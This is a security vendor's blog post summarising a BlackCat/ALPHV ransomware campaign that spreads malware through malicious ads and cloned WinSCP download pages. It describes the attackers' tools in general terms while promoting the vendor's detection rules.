BlackCat aka ALPHV Attack Detection: Hackers Abuse Malvertising to Spread Malware and Leverage SpyBoy Terminator to Hinder Security Protection
Table of contents:
Cybersecurity researchers have uncovered traces of new malicious activity attributed to the nefarious BlackCat aka ALPHV ransomware gang. The adversary campaign involves the distribution of malware via cloned webpages of legitimate companies, including the webpage of a popular WinSCP file-transferring service. BlackCat is also observed using SpyBoy Terminator for its offensive purposes to hinder anti-malware protection.
Detecting BlackCat’s Activity Spreading Malware via Cloned Webpages
With BlackCat ransomware operators continuously adding new nefarious features to the toolset and seeking effective attack methods, cyber defenders require a reliable source of detection algorithms and threat intel to proactively withstand possible intrusions. To detect the malicious activity associated with the latest BlackCat (ALPHV) campaign, download a set of dedicated Sigma rules available in the SOC Prime Platform.
All detection algorithms are compatible with 28 SIEM, EDR, and XDR technologies and aligned with MITRE ATT&CK framework v12 to streamline the threat hunting procedures.
Hit the Explore Detections button to explore a batch of curated Sigma rules aimed at BlackCat ransomware attack detection. All the rules are coming in rich metadata, including ATT&CK and CTI references. To help security practitioners during the content search, SOC Prime supports filtering by tags “BlackCat,” “ALPHV,” “SpyBoy” based on the titles of the malware samples used in the course of the campaign in the spotlight.
BlackCat’s Using Malvertising as Entry Vector: New Attack Analysis
The notorious ALPHV BlackCat ransomware affiliates have garnered significant attention in the cyber threat realm since mid-November 2021 targeting a variety of industry sectors across the globe and experimenting with multiple TTPs and offensive tools.
Trend Micro researchers have issued a report highlighting the recent activity of the BlackCat gang. In the latest campaign, malware distributors leverage a malvertising technique to spread malicious strains via cloned web pages of the open-source Windows application WinSCP. This hacking technique involves spreading malicious ads intended to lure compromised users into downloading certain types of malware.
BlackCat hackers were observed stealing credentials to perform unauthorized access to the targeted networks and access the backup server. They also leveraged the remote access management utilities to establish and maintain persistence on the compromised system and applied the SpyBot Terminator to bypass EDR and antivirus protection.
The infection chain is triggered by browsing for the keyword “WinSCP Download” via the Bing search engine with a malicious ad displayed to the targeted user and leading to the fraudulent website. By following the link, the user will be redirected to a cloned webpage of the legitimate WinSCP service. By clicking to download an ISO file masquerading as a legitimate application installer, the latter spreads the infection further via two malicious files, setup.exe and a delayed-loaded DLL file.
BlackCat also applied a set of other adversary tools to discover the compromised environment, including AdFind which can be used for collecting information from the Active Directory (AD) environments, privilege escalation, and credential theft. The gang also leveraged PowerShell commands to collect user data and store it in the CSV file. Among other tools, they took advantage of a set of command-line utilities, like AccessChk64 and findstr, and PowerShell scripts. To gain admin credentials and privilege escalation, BlackCat applied malicious Python scripts, while such tools as PsExec, BitsAdmin, and curl were used to download other tools and move laterally across the compromised environment.
Leveraging a well-known malvertising trick, BlackCat ransomware operators successfully spread the infection through a sketchy website masquerading as WinSCP installers. Rely on SOC Prime Platform to be fully equipped with relevant detection content against any TTP used in ongoing cyber-attacks. Reach the latest ready-to-deploy behavioral detection algorithms and explore relevant context on any cyber attack or threat, including zero-days, CTI and ATT&CK references, and Red Team tooling. Validate the detection stack backed by an automatic read-only ATT&CK data audit, identify blind spots, and timely address them to ensure complete threat visibility based on the organization-specific logs. Simplify ad-hoc tasks with Sigma and ATT&CK autocompletion, automate cross-platform query translation, and explore relevant cyber threat context from ChatGPT and the global cyber defender community to shave seconds off your SOC operations.